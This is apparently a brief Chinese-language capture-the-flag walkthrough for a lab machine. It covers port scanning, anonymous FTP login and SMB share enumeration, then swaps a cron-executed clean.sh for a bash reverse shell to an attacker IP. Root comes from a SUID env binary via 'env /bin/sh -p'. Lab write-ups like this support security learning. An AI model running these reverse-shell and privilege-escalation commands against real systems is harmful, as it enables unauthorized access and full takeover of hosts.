根据题目先扫端口

  sudo nmap -p 1-5000 -sV -O -v 10.10.121.117

能看见有ftp,ssh和smb

接着连接ftp

  ftp 10.10.121.117
Anonymous

连接成功,找到三个文件,有一个sh文件

接着枚举smb

  smbclient -L \\\\10.10.121.117

有共享文件夹pic,访问

  smbclient \\\\10.10.121.117\pics

只有图片

返回ftp,修改sh文件,弹shell

  bash -i >& /dev/tcp/10.8.43.78/11451 0>&1

上传

  append clean.sh

等待计划任务执行获得shell

之后提权,上传linpeas或者找suid都行

  find / -perm -u=s -type f 2>/dev/null

两个都能发现env

  env /bin/sh -p

提权成功